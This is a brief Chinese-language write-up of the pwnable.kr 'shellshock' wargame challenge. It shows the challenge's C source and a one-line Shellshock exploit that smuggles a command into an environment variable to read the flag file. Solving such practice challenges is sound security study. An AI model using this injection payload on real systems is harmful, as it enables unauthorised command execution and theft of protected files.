您的位置:首页 > 运维架构 > Shell

【pwnable.kr-----解题过程】shellshock

2015-09-16 07:43 579 查看
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}

根据题目一下子可以看出来这是shellshock(破壳)的利用,google一下利用方法,补上对应语句即可:

env x='() { :;}; /bin/cat flag' ./shellshock


注意一点是在使用的时候cat需要写成/bin/cat:
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: